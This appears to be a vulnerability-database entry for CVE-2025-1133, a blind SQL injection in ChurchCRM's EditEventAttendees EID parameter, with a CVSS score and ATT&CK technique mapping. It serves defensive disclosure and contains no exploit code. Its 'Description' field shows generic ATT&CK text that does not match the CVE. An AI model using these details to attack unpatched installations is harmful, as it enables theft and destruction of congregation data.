CVE-2025-1133
Published: 19 February 2025
Description
Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.
Security Summary
CVE-2025-1133 is a boolean-based blind SQL injection vulnerability affecting ChurchCRM versions 5.13.0 and prior. The issue exists in the EditEventAttendees functionality, where the EID parameter is directly concatenated into an SQL query without proper sanitization, enabling attackers to execute arbitrary SQL queries.
This vulnerability requires Administrator privileges for exploitation and can be triggered over the network with low attack complexity and no user interaction. A successful attack allows data exfiltration, modification, or deletion, with high impacts on confidentiality, integrity, and availability, as reflected in its CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
Mitigation details are available in the referenced advisory at https://github.com/ChurchCRM/CRM/issues/7252.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The SQL injection vulnerability in ChurchCRM enables arbitrary SQL query execution with admin privileges, facilitating database data collection (T1213.006), stored data manipulation via updates/inserts (T1565.001), and data destruction via deletes (T1485).